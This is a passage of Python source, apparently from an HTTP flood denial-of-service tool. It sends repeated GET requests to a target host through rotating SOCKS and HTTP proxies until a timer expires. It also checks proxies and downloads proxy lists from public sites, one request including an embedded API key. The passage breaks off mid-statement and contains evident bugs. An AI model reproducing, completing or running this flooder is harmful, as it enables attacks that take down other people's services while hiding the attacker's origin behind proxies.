header = Headers("get") 1004 | request = get_host + header 1005 | while time.time() < timer: 1006 | try: 1007 | s = socks.socksocket() 1008 | if socks_type == 4: 1009 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 1010 | if socks_type == 5: 1011 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 1012 | if socks_type == 1: 1013 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 1014 | s.connect((str(target), int(port))) 1015 | if protocol == "https": 1016 | ctx = ssl.SSLContext() 1017 | s = ctx.wrap_socket(s, server_hostname=target) 1018 | for _ in range(conn): 1019 | try: 1020 | s.send(request) * conn 1021 | t += 1 1022 | sys.stdout.write("Connections = " + t + "\r") 1023 | sys.stdout.flush() 1024 | except: 1025 | s.close() 1026 | proxy = Choice(proxies).strip().split(":") 1027 | except: 1028 | s.close() 1029 | proxy = Choice(proxies).strip().split(":") 1030 | 1031 | 1032 | def checking(lines, socks_type, ms): 1033 | global nums, proxies 1034 | proxy = lines.strip().split(":") 1035 | if len(proxy) != 2: 1036 | proxies.remove(lines) 1037 | return 1038 | err = 0 1039 | while True: 1040 | if err == 3: 1041 | proxies.remove(lines) 1042 | break 1043 | try: 1044 | s = socks.socksocket() 1045 | if socks_type == 4: 1046 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 1047 | if socks_type == 5: 1048 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 1049 | if socks_type == 1: 1050 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 1051 | s.settimeout(ms) 1052 | s.connect((str(target), int(port))) 1053 | if protocol == "https": 1054 | ctx = ssl.SSLContext() 1055 | s = ctx.wrap_socket(s, server_hostname=target) 1056 | s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) 1057 | s.close() 1058 | break 1059 | except: 1060 | err += 1 1061 | nums += 1 1062 | 1063 | 1064 | nums = 0 1065 | 1066 | 1067 | def check_socks(ms): 1068 | global nums 1069 | thread_list = [] 1070 | for lines in list(proxies): 1071 | if choice == "5": 1072 | th = threading.Thread(target=checking, args=(lines, 5, ms,)) 1073 | th.start() 1074 | if choice == "4": 1075 | th = threading.Thread(target=checking, args=(lines, 4, ms,)) 1076 | th.start() 1077 | if choice == "1": 1078 | th = threading.Thread(target=checking, args=(lines, 1, ms,)) 1079 | th.start() 1080 | thread_list.append(th) 1081 | sleep(0.01) 1082 | for th in list(thread_list): 1083 | th.join() 1084 | ans = "y" 1085 | if ans == "y" or ans == "": 1086 | if choice == "4": 1087 | with open(out_file, 'wb') as fp: 1088 | for lines in list(proxies): 1089 | fp.write(bytes(lines, encoding='utf8')) 1090 | fp.close() 1091 | elif choice == "5": 1092 | with open(out_file, 'wb') as fp: 1093 | for lines in list(proxies): 1094 | fp.write(bytes(lines, encoding='utf8')) 1095 | fp.close() 1096 | elif choice == "1": 1097 | with open(out_file, 'wb') as fp: 1098 | for lines in list(proxies): 1099 | fp.write(bytes(lines, encoding='utf8')) 1100 | fp.close() 1101 | 1102 | 1103 | def check_list(socks_file): 1104 | temp = open(socks_file).readlines() 1105 | temp_list = [] 1106 | for i in temp: 1107 | if i not in temp_list: 1108 | if ':' in i: 1109 | temp_list.append(i) 1110 | rfile = open(socks_file, "wb") 1111 | for i in list(temp_list): 1112 | rfile.write(bytes(i, encoding='utf-8')) 1113 | rfile.close() 1114 | 1115 | 1116 | def downloadsocks(choice): 1117 | global out_file 1118 | if choice == "4": 1119 | f = open(out_file, 'wb') 1120 | try: 1121 | r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all", 1122 | timeout=5) 1123 | f.write(r.content) 1124 | except: 1125 | pass 1126 | try: 1127 | r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4", timeout=5) 1128 | f.write(r.content) 1129 | except: 1130 | pass 1131 | try: 1132 | r = requests.get("https://www.proxyscan.io/download?type=socks4", timeout=5) 1133 | f.write(r.content) 1134 | except: 1135 | pass 1136 | try: 1137 | r = requests.get( 1138 | "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks4&lastchecked=60", 1139 | timeout=5) 1140 | f.write(r.content) 1141 | except: 1142 | pass 1143 | try: 1144 | r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", timeout=5) 1145 | f.write(r.content) 1146 | f.close() 1147 | except: 1148 | f.close() 1149 | try: 1150 | 1151 | req = requests.get("https://www.socks-proxy.net/", timeout=5, headers={"User-Agent", UserAgent}).text 1152 | part = str(req) 1153 | part = part.split("
") 1154 | part = part[1].split("") 1155 | part = part[0].split("